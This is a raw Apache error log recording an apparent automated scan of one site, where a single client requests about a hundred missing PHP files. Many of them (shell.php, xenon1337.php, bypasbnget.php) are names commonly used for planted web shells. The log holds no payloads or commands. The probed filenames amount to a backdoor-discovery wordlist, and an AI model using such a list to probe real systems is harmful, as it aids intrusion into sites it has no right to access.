[Mon May 11 21:17:31.563133 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:31.685243 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:31.817324 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:32.046538 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:32.224922 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/0x.php
[Mon May 11 21:17:32.248631 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/xenon1337.php
[Mon May 11 21:17:32.272071 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/mac.php
[Mon May 11 21:17:32.292521 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:32.295428 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/hayuk.php
[Mon May 11 21:17:32.319116 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/0d.php
[Mon May 11 21:17:32.342677 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/wefile.php
[Mon May 11 21:17:32.366106 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/casp3.php
[Mon May 11 21:17:32.390462 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/birlingsless.php
[Mon May 11 21:17:32.408873 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:32.413888 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/unvouc.php
[Mon May 11 21:17:32.439666 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/wp-signin.php
[Mon May 11 21:17:32.509561 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/wp-links.php
[Mon May 11 21:17:32.524999 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:32.580028 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/half.php
[Mon May 11 21:17:32.603474 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/2P.php
[Mon May 11 21:17:32.627033 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/tires.php
[Mon May 11 21:17:32.650701 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/aevly.php
[Mon May 11 21:17:32.697743 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/wp-block.php
[Mon May 11 21:17:32.721081 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/like.php
[Mon May 11 21:17:32.744599 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/kj.php
[Mon May 11 21:17:32.769505 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/.well-known/about.php
[Mon May 11 21:17:32.816445 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/wpxml.php
[Mon May 11 21:17:32.831766 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:32.839740 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/bob.php
[Mon May 11 21:17:32.863197 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/spawns.php
[Mon May 11 21:17:32.887481 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/t3s.php
[Mon May 11 21:17:32.951066 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:33.009037 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/uwu.php
[Mon May 11 21:17:33.032409 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/uwa.php
[Mon May 11 21:17:33.055832 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/crgio.php
[Mon May 11 21:17:33.079268 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/geforce.php
[Mon May 11 21:17:33.102545 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/wp-load.php
[Mon May 11 21:17:33.125787 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/3PJcpMFsD8B.php
[Mon May 11 21:17:33.149095 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/.sghb.php
[Mon May 11 21:17:33.173270 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/zoko.php
[Mon May 11 21:17:33.198578 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/bgymj.php
[Mon May 11 21:17:33.226078 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/pucci.php
[Mon May 11 21:17:33.341430 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:33.367794 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/one.php
[Mon May 11 21:17:33.391488 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/sl.php
[Mon May 11 21:17:33.414810 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/wp-temp.php
[Mon May 11 21:17:33.461315 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/xmu.php
[Mon May 11 21:17:33.470354 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:33.484629 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/mode.php
[Mon May 11 21:17:33.531457 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/dx.php
[Mon May 11 21:17:33.554981 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/puc.php
[Mon May 11 21:17:33.578595 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/themes.php
[Mon May 11 21:17:33.590841 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:33.601985 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/dx.php
[Mon May 11 21:17:33.625407 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/awa.php
[Mon May 11 21:17:33.648841 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/11.php
[Mon May 11 21:17:33.677719 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/p.php
[Mon May 11 21:17:33.707349 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:33.725501 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/bthil.php
[Mon May 11 21:17:33.748817 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/shell.php
[Mon May 11 21:17:33.772143 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/seo.php
[Mon May 11 21:17:33.795799 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/7.php
[Mon May 11 21:17:33.819757 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/8.php
[Mon May 11 21:17:33.824140 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:33.843296 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/1.php
[Mon May 11 21:17:33.866689 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/class.php
[Mon May 11 21:17:33.890023 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/100.php
[Mon May 11 21:17:33.913438 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/2026w.php
[Mon May 11 21:17:33.936882 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/about.php
[Mon May 11 21:17:33.952457 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:33.961961 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/xa.php
[Mon May 11 21:17:33.985626 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/admin.php
[Mon May 11 21:17:34.009035 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/w2025.php
[Mon May 11 21:17:34.032689 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/fvvff.php
[Mon May 11 21:17:34.056679 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/edit.php
[Mon May 11 21:17:34.068753 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:34.080238 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/admin.php
[Mon May 11 21:17:34.129176 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/f6.php
[Mon May 11 21:17:34.153030 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/inputs.php
[Mon May 11 21:17:34.182304 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/av.php
[Mon May 11 21:17:34.185162 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:34.230447 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/wp-act.php
[Mon May 11 21:17:34.254598 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/classwithtostring.php
[Mon May 11 21:17:34.310066 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/wp-blog.php
[Mon May 11 21:17:34.324811 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:34.381533 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/adminfuns.php
[Mon May 11 21:17:34.405385 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/goods.php
[Mon May 11 21:17:34.429714 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/ms-edit.php
[Mon May 11 21:17:34.443554 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:34.453370 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/222.php
[Mon May 11 21:17:34.525820 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/BDKR28WP.php
[Mon May 11 21:17:34.593378 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:34.596612 2026] [:error] [pid 1501831:tid 1501857] [client 20.223.136.145:4885] File does not exist: /home/pweilcom/public_html/wp.php
[Mon May 11 21:17:34.673315 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/av.php
[Mon May 11 21:17:34.697962 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/abcd.php
[Mon May 11 21:17:34.722066 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/a1.php
[Mon May 11 21:17:34.794559 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/f35.php
[Mon May 11 21:17:34.815267 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:34.843144 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/bal.php
[Mon May 11 21:17:34.915495 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/gettest.php
[Mon May 11 21:17:34.931779 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:34.990705 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/simple.php
[Mon May 11 21:17:35.014831 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/buy.php
[Mon May 11 21:17:35.038932 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/xxx.php
[Mon May 11 21:17:35.048390 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:35.071425 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/hypo.php
[Mon May 11 21:17:35.119827 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/chosen.php
[Mon May 11 21:17:35.167643 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:35.167996 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/00.php
[Mon May 11 21:17:35.192244 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/als.php
[Mon May 11 21:17:35.216365 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/pol.php
[Mon May 11 21:17:35.240621 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/ms-amdin.php
[Mon May 11 21:17:35.265038 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/mini-type0.php
[Mon May 11 21:17:35.289227 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/bypasbnget.php
[Mon May 11 21:17:35.299073 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:35.314677 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/sf.php
[Mon May 11 21:17:35.340418 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/file5.php
[Mon May 11 21:17:35.364461 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/fs.php
[Mon May 11 21:17:35.388664 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/4PJcpMFsD8B.php
[Mon May 11 21:17:35.412715 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/file.php
[Mon May 11 21:17:35.415929 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:35.436787 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/class.1.php
[Mon May 11 21:17:35.461390 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/wp-gr.php
[Mon May 11 21:17:35.485455 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/cfile.php
[Mon May 11 21:17:35.509618 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/class-wp.php
[Mon May 11 21:17:35.540628 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/ff2.php
[Mon May 11 21:17:35.547079 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:35.565015 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/aa2.php
[Mon May 11 21:17:35.589423 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/133.php
[Mon May 11 21:17:35.613666 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/ccou.php
[Mon May 11 21:17:35.637891 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/login8.php
[Mon May 11 21:17:35.662074 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/3586 b64.php
[Mon May 11 21:17:35.663824 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:35.686183 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/18299.php
[Mon May 11 21:17:35.710232 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/nx1.php
[Mon May 11 21:17:35.734694 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/Noname6.php
[Mon May 11 21:17:35.759721 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/tia.php
[Mon May 11 21:17:35.780493 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:35.783819 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/coa.php
[Mon May 11 21:17:35.807903 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/dr.php
[Mon May 11 21:17:35.832016 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/let.php
[Mon May 11 21:17:35.856197 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/w12.php
[Mon May 11 21:17:35.880249 2026] [:error] [pid 1534836:tid 1534888] [client 20.223.136.145:4915] File does not exist: /home/pweilcom/public_html/chati.php
[Mon May 11 21:17:35.897098 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:36.095430 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:36.211849 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:36.328200 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:36.450316 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:36.586932 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:36.704278 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:36.820703 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:37.250294 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:37.383521 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:37.500292 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:37.626667 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:37.743250 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:37.877279 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:37.993680 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:38.110765 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:38.236089 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:38.355552 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:38.670928 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:38.790782 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:38.914931 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:39.157378 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:39.740628 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:39.861774 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:39.979364 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:40.454749 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:40.571232 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:40.687572 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:40.803918 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:40.924092 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:41.040589 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:41.173506 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:41.303536 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:41.420168 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:41.902176 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:42.021457 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:42.601726 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:42.727069 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:42.851754 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:42.968148 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:43.088681 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:43.223309 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:43.354599 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:43.471292 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:43.587601 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:43.704101 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:43.830864 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
